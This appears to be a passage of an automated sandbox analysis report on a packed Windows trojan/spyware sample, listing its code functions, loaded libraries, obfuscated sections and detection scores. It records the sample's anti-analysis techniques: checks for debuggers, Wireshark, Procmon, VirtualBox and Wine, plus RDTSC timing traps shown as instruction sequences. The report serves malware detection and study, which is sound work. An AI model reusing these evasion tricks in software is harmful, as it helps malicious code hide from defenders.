    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0058D4301_2_0058D430
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005935B01_2_005935B0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005B17A01_2_005B17A0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002D98801_2_002D9880
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005799201_2_00579920
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_005A3A701_2_005A3A70
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00591BD01_2_00591BD0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00261BE01_2_00261BE0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00587CC01_2_00587CC0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_004D9C801_2_004D9C80
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00235DB01_2_00235DB0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00245EB01_2_00245EB0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00233ED01_2_00233ED0
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 00264FD0 appears 288 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 003D7220 appears 99 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 00264F40 appears 332 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 00265340 appears 50 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 0023CCD0 appears 55 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 002275A0 appears 706 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 0022C960 appears 37 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 003044A0 appears 76 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 002273F0 appears 114 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 002271E0 appears 47 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 0022CAA0 appears 64 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 003FCBC0 appears 90 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 002650A0 appears 101 times
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: String function: 0023CD40 appears 80 times
    Source: FYQ6Ee6gbS.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
    Source: FYQ6Ee6gbS.exeStatic PE information: Section: bqmneslf ZLIB complexity 0.9946908708756346
    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0022255D
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_002229FF
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: FYQ6Ee6gbS.exeVirustotal: Detection: 50%
    Source: FYQ6Ee6gbS.exeReversingLabs: Detection: 70%
    Source: FYQ6Ee6gbS.exeString found in binary or memory: Unable to complete request for channel-process-startup
    Source: FYQ6Ee6gbS.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: FYQ6Ee6gbS.exe | Static file information: File size 4487168 > 1048576
    Source: FYQ6Ee6gbS.exe | Static PE information: Raw size of section "" (empty name) is bigger than 0x100000: 0x288800
    Source: FYQ6Ee6gbS.exe | Static PE information: Raw size of section bqmneslf is bigger than 0x100000: 0x1bb400

    Data Obfuscation

    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Unpacked PE file: 1.2.FYQ6Ee6gbS.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bqmneslf:EW;xbtqkxjw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bqmneslf:EW;xbtqkxjw:EW;.taggant:EW;
    Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
    Source: FYQ6Ee6gbS.exe | Static PE information: real checksum: 0x45410a should be: 0x44d390
    Source: FYQ6Ee6gbS.exe | Static PE information: section name: "" (empty)
    Source: FYQ6Ee6gbS.exe | Static PE information: section name: .idata
    Source: FYQ6Ee6gbS.exe | Static PE information: section name: "" (empty)
    Source: FYQ6Ee6gbS.exe | Static PE information: section name: bqmneslf
    Source: FYQ6Ee6gbS.exe | Static PE information: section name: xbtqkxjw
    Source: FYQ6Ee6gbS.exe | Static PE information: section name: .taggant
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_3_014F5BF5 push ss; ret 1_3_014F5CE1
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_3_014F5E72 push edx; ret 1_3_014F5EC1
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_3_015562C4 push eax; ret 1_3_015562CB
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_3_0155A5C2 push esp; iretd 1_3_0155AA4F
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_3_0155B380 push esp; iretd 1_3_0155B381
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_005A41D0 push eax; mov dword ptr [esp], edx 1_2_005A41D5
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_002A2340 push eax; mov dword ptr [esp], 00000000h 1_2_002A2343
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_002DC7F0 push eax; mov dword ptr [esp], 00000000h 1_2_002DC743
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_00260AC0 push eax; mov dword ptr [esp], 00000000h 1_2_00260AC4
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_00281430 push eax; mov dword ptr [esp], 00000000h 1_2_00281433
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_002A39A0 push eax; mov dword ptr [esp], 00000000h 1_2_002A39A3
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_0027DAD0 push eax; mov dword ptr [esp], edx 1_2_0027DAD1
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Code function: 1_2_005A9F40 push dword ptr [eax+04h]; ret 1_2_005A9F6F
    Source: FYQ6Ee6gbS.exe | Static PE information: section name: bqmneslf entropy: 7.9570043649451305

    Boot Survival

    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Window searched: window name: FilemonClass
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Window searched: window name: PROCMON_WINDOW_CLASS
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Window searched: window name: RegmonClass
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Window searched: window name: Regmonclass
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | Window searched: window name: Filemonclass

    Malware Analysis System Evasion

    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | File opened: HKEY_CURRENT_USER\Software\Wine
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
    Source: FYQ6Ee6gbS.exe, 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp, FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A29628 second address: A29639 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FB418E0AE76h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A29639 second address: A2964F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A296E7 second address: A296EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A29C33 second address: A29C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418AEFE53h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2D0B2 second address: A2D0CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007FB418E0AE76h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FB418E0AE7Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E686 second address: A2E68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E68D second address: A2E69C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E69C second address: A2E6A6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E6A6 second address: A2E72A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FB418E0AE78h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 stc 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FB418E0AE78h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 stc 0x00000042 mov edi, dword ptr [ebp+122D2A86h] 0x00000048 push 00000000h 0x0000004a mov di, A8E7h 0x0000004e mov edi, dword ptr [ebp+12471161h] 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 jl 00007FB418E0AE76h 0x0000005e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E72A second address: A2E755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FB418AEFE48h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E755 second address: A2E75B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3070F second address: A3072E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jns 00007FB418AEFE46h 0x00000016 popad 0x00000017 jnp 00007FB418AEFE4Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3072E second address: A307A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 movzx edi, cx 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FB418E0AE78h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 movzx edi, di 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FB418E0AE78h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 pushad 0x00000045 jmp 00007FB418E0AE7Dh 0x0000004a mov dword ptr [ebp+124431FAh], eax 0x00000050 popad 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FB418E0AE7Fh 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A307A2 second address: A307A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A321C2 second address: A321C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A321C8 second address: A321CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A321CD second address: A32223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub edi, dword ptr [ebp+122D2A8Eh] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FB418E0AE78h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e movzx edi, dx 0x00000031 push 00000000h 0x00000033 sub ebx, dword ptr [ebp+122D2BFAh] 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A32223 second address: A32227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A32227 second address: A3222B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3222B second address: A32256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 je 00007FB418AEFE46h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB418AEFE59h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A32256 second address: A32260 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418E0AE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A32FE9 second address: A33053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, esi 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FB418AEFE48h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 jmp 00007FB418AEFE54h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D28F0h], esi 0x00000034 xchg eax, esi 0x00000035 jmp 00007FB418AEFE57h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jne 00007FB418AEFE48h 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A33053 second address: A33059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3511A second address: A3511E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A361D3 second address: A361DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A361DD second address: A361E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A361E1 second address: A361F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB418E0AE7Ah 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A361F7 second address: A361FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A361FB second address: A36201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A37170 second address: A371DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jnl 00007FB418AEFE54h 0x0000000d nop 0x0000000e mov edi, dword ptr [ebp+122D19E3h] 0x00000014 jg 00007FB418AEFE4Ch 0x0000001a push 00000000h 0x0000001c movsx edi, di 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007FB418AEFE48h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b xchg eax, esi 0x0000003c jg 00007FB418AEFE50h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A371DF second address: A371E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A371E3 second address: A371F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A331B2 second address: A33256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FB418E0AE7Fh 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FB418E0AE78h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c jmp 00007FB418E0AE84h 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 adc di, 1471h 0x0000003d mov eax, dword ptr [ebp+122D0D65h] 0x00000043 mov dword ptr [ebp+124619DBh], eax 0x00000049 or bx, 12EDh 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007FB418E0AE78h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 0000001Ch 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a mov ebx, esi 0x0000006c nop 0x0000006d je 00007FB418E0AE80h 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A33256 second address: A33263 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A33263 second address: A33272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3423B second address: A34241 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
